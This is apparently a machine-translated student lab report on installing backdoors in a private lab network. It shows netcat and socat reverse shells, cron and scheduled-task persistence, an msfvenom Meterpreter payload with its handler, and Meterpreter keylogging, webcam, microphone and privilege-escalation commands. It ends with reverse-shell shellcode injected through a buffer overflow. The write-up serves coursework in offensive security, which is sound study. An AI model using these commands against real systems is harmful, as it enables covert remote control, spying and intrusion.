2019-2020-2 20,175,322 weeks Yi Hung "Network Warfare Technology" Exp2 back door Principles and Practice

---

1. back door concept

• The back door is not accessible through the normal certification process and channel system.

2. Common backdoor

2.1 NC or netcat

• Also known as nc, ncat
• http://nc110.sourceforge.net/
• http://netcat.sourceforge.net/

2.1.1 Win obtain Linux Shell

• In Windows uses ipconfigto view the local IP
  

• Use ncat.exe program ncat.exe -l -p 5322open to listen and check the connectivity of windows and linux
  

  

• In kali rebounded connected Windows, ncat 192.168.132.1 5322 -e /bin/sh, using the -eoption to perform shell program
  

• Obtaining a linux shell under Windows, it can be run any command, such asls
  

2.1.2 Linux get Win Shell

• In the kali install net-tools, before you can use use the ifconfigcommand to view the IP
  

• Open monitoringnc -l -p 5322
  

• In Windows rebound in connection kali,ncat.exe -e cmd.exe 192.168.132.138 5322
  

• kali successful Windows command prompt
  

* 2.1.3 Mac Gets Win shell

* 2.1.4 Win obtain Mac Shell

* 2.1.5 Mac get Linux Shell

* 2.1.6 Linux Gets Mac Shell

2.1.7 Netcat expansion of knowledge

Transmitting data using nc

• Listening port under Windows 5322,ncat.exe -l 5322
• kali rebound port to connect to a Windows 5322,nc 192.168.132.1 5322
• The connection is established, the two sides can transmit data to each other
  

Use nc transfer files (the files from kali passed Windows)

• Listening port under Windows 5322, and save the received data to file1.out in, ncat.exe -l 5322> file1.out
• kali rebound port to connect to a Windows 5322, nc 192.168.132.1 5322 <file1.in
• The connection is established, Windows can receive files sent by kali
  

2.2 Meter Preter

• Is a backdoor program.
• The traditional understanding is: someone to write a backdoor, we make use of them.
• Later, some cattle do, wanted to write a platform to generate backdoors. This platform does, the back door
  • Basic functions (basic connectivity, executing instructions),
  • Extensions (such as collecting user information, installation services and other functions),
  • Coding mode,
  • Operating platform,
  • And operating parameters
• Part or all made adjustable parameters. When used in combination as needed, you can generate an executable file.
• Typical platform will include:
  • intersect
  • Metaspolit of msfvenom instructions
  • Veil-evasion
• Parameter Description
  • -ppayload using, payload translated as payload, is to be transported something. Here windows / meterpreter / reverse_tcp is a piece of shellcode.
  • -x Executable file template to use, payload (shellcode) is written into the executable file.
  • -e Encoder used, for shellcode deformation, in order to avoid killing.
  • -iThe number of iterations of the encoder. I.e., use of the above encoder 5 encodes.
  • -b badchar payload is to be removed in character.
  • LHOST IP is connected bounce back
  • LPORT It is connected back to port
  • -f Type of document generation
  • > To which the output file

3. Start the back door

3.1 netcat get the host operating Shell, cron start

• crontab -eIncreasing a timed task instructions, -eexpressed editing. Because it is the first time editing, it is prompted to select the editor, choose here is the3

• The last line add 58 * * * * / bin / netcat 192.168.132.1 5322 -e / bin / sh, which means reverse connection of Windows hosts in the 58th minute of every hour port 5322
  

• linux windows connected at 58 minutes, which is connected to a bounce back door, available shell after listening windows connection
  

3.2 socat get the host operating Shell, plans to start the task

• Right-click 我的电脑, click管理

• Click 任务计划程序, then click创建任务
  

• Fill in the name of the task, create a new trigger
  

• New Action and select the program or script socat.exepath, add a column to fill in the parameterstcp-listen:5322 exec:cmd.exe,pty,stderr
  

• After creating display task ready
  

• Upon arrival 21:25, when turned on again, you can create a discovery task is running
  

• A pop-up window on their own cmd
  

• Kali the input instruction socat - tcp:192.168.132.1:5322, to complete the connection, obtaining windows shell
  

3.3 MSF meterpreter (or other software) to generate an executable file, or using ncat socat transferred to the host and the host operating acquired Shell

• Use linux msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.132.138 LPORT=5322 -f exe > backdoor5322.exegenerating backdoor
  

• windows use ncat.exe -lv 5322 > backdoor5322.exe, check the connection status
  

• linux using nc 192.168.132.1 5322 < backdoor5322.exetransmission backdoor, after the successful transfer windows will prompt
  

• Successfully transmitting and receiving files
  

• linux use msfconsoleto enter msf console and type the following command:

使用监听模块，设置payload:use exploit/multi/handler
使用和生成后门程序时相同的payload:set payload windows/meterpreter/reverse_tcp
linux的IP地址:set LHOST 192.168.132.138
使用相同的端口:set LPORT 5322
查看设置:show options

• After entering the msf console interface:
  

• After the input command interface:
  

• linux use exploitto start listening, and run the backdoor in windows, linux successfully obtained the windows shell
  

  

3.4 MSF meterpreter (or other software) to generate the target host to obtain audio content, camera, keyloggers, etc., and try to put right

• Use record_micinstructions can intercept an audio
  

• Use webcam_snapinstructions can use the camera to take pictures
  

• Use keyscan_startinstructions recorded keystrokes process, use keyscan_dumpinstruction to read recorded keystroke
  

• Use screenshotinstructions can be screenshots
  

• Use getuidcommand to view the current user, use the getsysteminstructions mention the right to operate
  

3.5 plus optional content: MSF generated using the shellcode, poured into 1 pwn1 in practice, the acquisition rebound connection Shell

• In the Exploit DataBase search for linux/x86 - Reverseshellcode to download and extract bounce connected machine code which:

\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80

• Use linux echo "0" > /proc/sys/kernel/randomize_va_spaceClose address randomization
  

• Using the following command to enable output redirection> The perlresulting string is stored in the file input_shellcode:

perl -e 'print "A"x 32;print"\x31\xc0\x31\xdb\x31\xc9\x31\xd2\x66\xb8\x67\x01\xb3\x02\xb1\x01\xcd\x80\x89\xc3\xb8\x80\xff\xff\xfe\x83\xf0\xff\x50\x66\x68\x11\x5c\x66\x6a\x02\x89\xe1\xb2\x10\x31\xc0\x66\xb8\x6a\x01\xcd\x80\x85\xc0\x75\x24\x31\xc9\xb1\x02\x31\xc0\xb0\x3f\xcd\x80\x49\x79\xf9\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x31\xc9\x31\xd2\xb0\x0b\xcd\x80\xb3\x01\x31\xc0\xb0\x01\xcd\x80"' > input_shellcode

• Open a terminal use (cat input_shellcode;cat) | ./pwn1injection attack this buf, then open another terminal using the ps -ef | grep pwn1find pwn1process ID, after starting gdbto use attachthe debugger, use disassemble footo view retthe address, set breakpoints, and then in another terminal Press Enter, and then in the gdbinput ccontinues run
  

  

• Use info r espLocation stack pointer is located, and to change the address stored in the data view
  

Address is stored 0xffffd38c, shellcode address is calculated 0xffffd38c+4, that is0xffffd390

• Open msf console starts listening in a terminal

• In another modification terminal input_shellcodeand use the cat input_shellcode;cat) | ./pwn1run pwn1file
  

• To give another terminal starts running shell
  

4. Harvest thoughts

• The experiment is relatively simple, but time-consuming better. The experimental operation of a process before bonus items can learn, throughout the experiment is not much difficulty. Through this experiment, I understand the basic principles of the back door, operating experience yourself, feel the dangers of the back door, and I hope in the future of the learning process can learn more knowledge.

5. questions answered

• (1) include a back door you can think of possible ways to enter your system?
  • On the unofficial Web site to download the application, these procedures may bind certain executable files, leaving the back door. After clicking the link phishing sites, there may be an executable file is downloaded to your computer, leaving the back door.
• (2) How do you know exemplified by the back door to start up (win and linux) way?
  • Linux: Crontab timer start; injection shellcode.
  • Windows: New Task Scheduler; modify a registry key setting backdoor from the start; user execution file with the back door.
• Which gives you a profound image function (3) Meterpreter there?
  • Controlled by controlling the back door of the shell host, target host can acquire audio, camera, keystroke recording and other functions.
• (4) How to find yourself the system has not been installed back door?
  • Use security software, the system timing detection, killing the malicious files.
  • Use Task Manager and other system software background to see if there are abnormal program.